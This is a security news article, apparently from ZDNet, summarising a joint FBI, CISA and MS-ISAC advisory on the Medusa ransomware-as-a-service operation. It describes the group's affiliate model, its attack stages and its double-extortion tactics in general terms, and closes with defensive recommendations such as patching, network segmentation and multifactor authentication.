Wednesday, March 19, 2025
Latest:
ZDNet | Security

How to guard against a vicious Medusa ransomware attack – before it’s too late

TH Author
How to protect yourself and your company from the vicious Medusa ransomware

ZDNET

Federal authorities are warning individuals and organizations to watch out for a dangerous ransomware campaign that has recently added hundreds of victims to its count. Identifying the ransomware as Medusa, the FBI, CISA, and MS-the ISAC (Multi-State Information Sharing and Analysis Center) have issued a joint advisory with details on how these attacks have played out and how people can defend themselves against them.

What is Medusa?

First spotted in June 2021, Medusa is a ransomware-as-a-service (RaaS) variant that targets critical infrastructure organizations, such as those in the medical, education, legal, insurance, technology, and manufacturing sectors. Using RaaS, the developers farm out work to affiliates who carry out the actual attacks. Since just last month, developers and affiliates have hit more than 300 victims.

Medusa started as a closed ransomware variant, meaning that the same cybercriminals who develop the malware also carry out the attacks. But over time, it has transitioned to an affiliate model, where hired guns launch the attacks while the developers focus on ransom negotiations and other actions. Developers typically recruit affiliates on dark web forums and marketplaces, offering them anywhere from $100 to $1 million for exclusive work.

Also: That weird CAPTCHA could be a malware trap – here’s how to protect yourself

The affiliates compromise a targeted organization using one of two methods. Phishing campaigns are the primary approach, but the attackers also exploit unpatched software vulnerabilities to gain access to a company’s resources. Once that initial access is gained, the criminals use a variety of tools to advance further.

Legitimate utilities such as Advanced IP Scanner and SoftPerfect Network Scanner are used to scan for vulnerable users, systems, and open ports to exploit. Tools like PowerShell and the Windows command prompt are used to compile a list of network and file resources.

The next goal is to move laterally through the network to find files that can be stolen and encrypted. For that, the attackers use remote access software such as AnyDesk, Atera, and Splashtop in combination with Remote Desktop Protocol and PsExec. When they find a valid username and password, they’ll use PsExec to run certain files and processes with system-level privileges.

AlsoWhy rebooting your phone daily is your best defense against zero-click attacks

Throughout the entire attack, the criminals also need to cover their tracks and evade detection. For that, they may exploit vulnerable or signed drivers to kill endpoint detection and response tools. A utility known as Certutil is often used to skirt detection when accessing files for encryption. Additionally, the attackers may delete the PowerShell history to wipe their command lines.

Double-extortion model

Like many other strains of ransomware, Medusa employs a double-extortion model. The stolen data is not only encrypted to prevent the victim from accessing it, but the criminals also threaten to release the data publicly unless the ransom is paid. Victims are told to respond to the ransom note within 48 hours, or else the attackers will contact them by phone or email.

Also: Got a suspicious E-ZPass text? It’s a trap – how to spot the scam

A Medusa data leak site lists the ransom demands with a countdown until the information is released publicly. But even before the countdown ends, Medusa will promote the sale of the stolen data to interested buyers. Victims can pay $10,000 in cryptocurrency to add another day to the timer.

The reported culprit behind Medusa is a group called Spearwing, according to a report published by Symantec earlier this month. Since early 2023, the group has listed almost 400 victims on its data leak site, with the actual number likely much higher. Attackers using Medusa have demanded ransoms ranging from as low as $100,000 to as high as $15 million.

How can you protect yourself from Medusa

With the damage caused by Medusa and other ransomware variants, how can you protect yourself? 

Also: What is vishing? Voice phishing is surging – expert tips on how to spot it and stop it

The joint advisory offers several tips, mostly geared toward large organizations. Here are a few:

  1. Patch known and critical security vulnerabilities. Make sure your operating systems, software, and firmware are all patched and up to date.
  2. Segment your networks. Segmenting your networks limits attackers who compromise one segment or device from doing the same to other segments and devices.
  3. Filter network traffic. By filtering your network traffic, you can better prevent unknown or untrusted accounts and individuals from accessing remote services on your internal systems.
  4. Disable unused ports. This ensures that attackers won’t be able to compromise your network through an open and vulnerable port.
  5. Set up a recovery plan to protect critical data. Be sure to store multiple copies of sensitive or proprietary data in a location that’s physically separate and segmented from your primary network.
  6. Enable multifactor authentication. Require MFA for all accounts and services that access webmail, VPNs, and critical systems.
  7. Monitor for unusual network activity. Use tools that can log and report all network traffic to look for and alert you to unusual or abnormal activity, including lateral movement on your network.

READ MORE HERE